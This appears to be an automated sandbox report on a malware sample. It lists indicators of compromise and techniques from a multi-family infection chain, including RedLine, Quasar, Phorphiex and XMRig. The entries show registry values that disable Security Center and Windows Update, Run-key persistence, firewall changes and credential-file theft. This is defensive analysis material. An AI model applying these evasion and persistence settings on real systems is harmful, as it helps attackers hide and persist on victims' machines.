asyncrat | 2840a81e534aa9badebe491f4e4a860a137f8eeb6f70e51c6262d832c5f576eb

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 4 IoCs

resource	yara_rule
behavioral2/files/0x000c000000023af6-30.dat	family_phorphiex
behavioral2/files/0x0010000000023af7-44.dat	family_phorphiex
behavioral2/files/0x000e000000023bc2-69.dat	family_phorphiex
behavioral2/files/0x0007000000023cd2-15187.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000400000001e74e-16.dat	family_quasar
behavioral2/memory/4424-24-0x00000000006D0000-0x00000000009F4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/memory/12960-15839-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral2/files/0x000c0000000226fe-15953.dat	family_redline
behavioral2/memory/13760-15958-0x00000000009C0000-0x00000000009FE000-memory.dmp	family_redline

Redline family
redline
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Socks5systemz family
socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 18296 created 3532	18296	3402010102.exe	56
PID 18296 created 3532	18296	3402010102.exe	56
PID 18968 created 3532	18968	winupsecvmgr.exe	56
PID 18968 created 3532	18968	winupsecvmgr.exe	56
PID 18968 created 3532	18968	winupsecvmgr.exe	56
PID 37700 created 3532	37700	Earl.pif	56

Troldesh family
troldesh
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh

Windows security bypass 2 TTPs 24 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0008000000023c21-13281.dat	family_asyncrat

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/18968-13559-0x00007FF7C7E20000-0x00007FF7C83B7000-memory.dmp	xmrig
behavioral2/memory/19336-13579-0x00007FF7E66B0000-0x00007FF7E6E9F000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
19512	powershell.exe
18640	powershell.exe
19128	powershell.exe
39752	powershell.exe
2028	powershell.exe
19668	powershell.exe
15620	powershell.exe
4420	powershell.exe
1492	powershell.exe
6264	powershell.exe
6624	powershell.exe
9300	powershell.exe
9472	powershell.exe
12456	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
10172	netsh.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	meshagent32-group.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	99597542.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	816212898.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	52263531.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	VidsUsername.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	DivineDialogue.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sysvplervcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Solara_Protect.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	531210104.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	ovrflw.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Ukodbcdcl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	dayum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	build_2024-07-25_20-56.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe	server.exe

Executes dropped EXE 64 IoCs

pid	Process
4068	npp.exe
4424	Office.exe
2356	pi.exe
4884	svchost.exe
4920	s.exe
3240	sysppvrdnvs.exe
5096	sysvplervcs.exe
3732	1548427715.exe
2940	sysnldcvmr.exe
4036	svchost.exe
3432	svchost.exe
316	Geek_se.exe
39608	utility-inst.exe
40568	utility-inst.tmp
40692	Solara_Protect.exe
8632	Windows.exe
8672	svchost.exe
9124	svchost.exe
4044	stories.exe
15436	stories.tmp
15748	shineencoder32.exe
15892	svchost.exe
16172	svchost.exe
16424	svchost.exe
16712	svchost.exe
17004	svchost.exe
17016	531210104.exe
17480	1142231072.exe
17572	99597542.exe
17776	svchost.exe
17876	816212898.exe
18156	1475019939.exe
18296	3402010102.exe
18312	1657131776.exe
18356	14548093.exe
18380	255224367.exe
18412	svchost.exe
18968	winupsecvmgr.exe
19044	390324013.exe
19096	1074232686.exe
19424	svchost.exe
19480	2126315482.exe
19648	3362324257.exe
19740	svchost.exe
20024	svchost.exe
20296	svchost.exe
20612	svchost.exe
20868	svchost.exe
21124	svchost.exe
21392	svchost.exe
21660	svchost.exe
21924	svchost.exe
22428	svchost.exe
540	svchost.exe
1440	svchost.exe
5132	svchost.exe
5428	svchost.exe
5708	svchost.exe
22184	svchost.exe
22688	1483322851.exe
22716	svchost.exe
22888	sysnldcvmr.exe
23172	svchost.exe
23452	svchost.exe

Loads dropped DLL 61 IoCs

pid	Process
40568	utility-inst.tmp
15436	stories.tmp
15748	shineencoder32.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
25436	dtl.exe
27788	curlapp64.exe
27788	curlapp64.exe
33096	foggy-mountains.exe
33096	foggy-mountains.exe
34948	printui.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	45.155.250.90

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 28 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe

Adds Run key to start application 2 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe"	s.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	NoMoreRansom.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\curlapp64 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\curlapp64.exe"	curlapp64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe"	tt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	1548427715.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nvaurnhq = "C:\\Users\\Admin\\AppData\\Roaming\\Nvaurnhq.exe"	Ukodbcdcl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Reaper%20cfx%20Spoofer%20V2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysppvrdnvs.exe"	twztl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	pi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	1483322851.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Network Agent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Network Agent\\mswabnet.exe\""	ovrflw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
783	raw.githubusercontent.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com
529	raw.githubusercontent.com
531	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
553	ip-api.com

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
39060	powercfg.exe
39120	powercfg.exe
39088	powercfg.exe
39068	powercfg.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ucrtbase.pdb	MeshAgent.exe
